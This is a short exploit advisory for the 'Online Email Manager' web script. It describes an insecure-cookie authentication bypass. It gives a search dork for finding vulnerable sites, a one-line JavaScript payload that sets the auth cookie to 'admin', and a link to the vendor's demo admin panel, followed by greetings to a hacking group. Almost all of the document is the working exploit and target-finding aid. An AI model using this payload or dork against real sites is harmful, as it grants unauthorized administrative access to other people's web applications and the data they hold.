Online Email Manager Insecure Cookie Handling Vulnerability 


{____________________________________}
 Author: Hussin X

 Home :  WwW.IQ-TY.CoM 

 email:  darkangel_g85[at]Yahoo[DoT]com
{____________________________________}



script : http://www.esoftpro.com/web_scripts_online_email_manager.php
 
DorK   : Powered by Online Email Manager



exploit:


javascript:document.cookie = "auth=admin; path=/";


Demo :

http://www.esoftpro.com/demo/OEM/admin/index.php


auth = esoftcom_demo






Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }

end.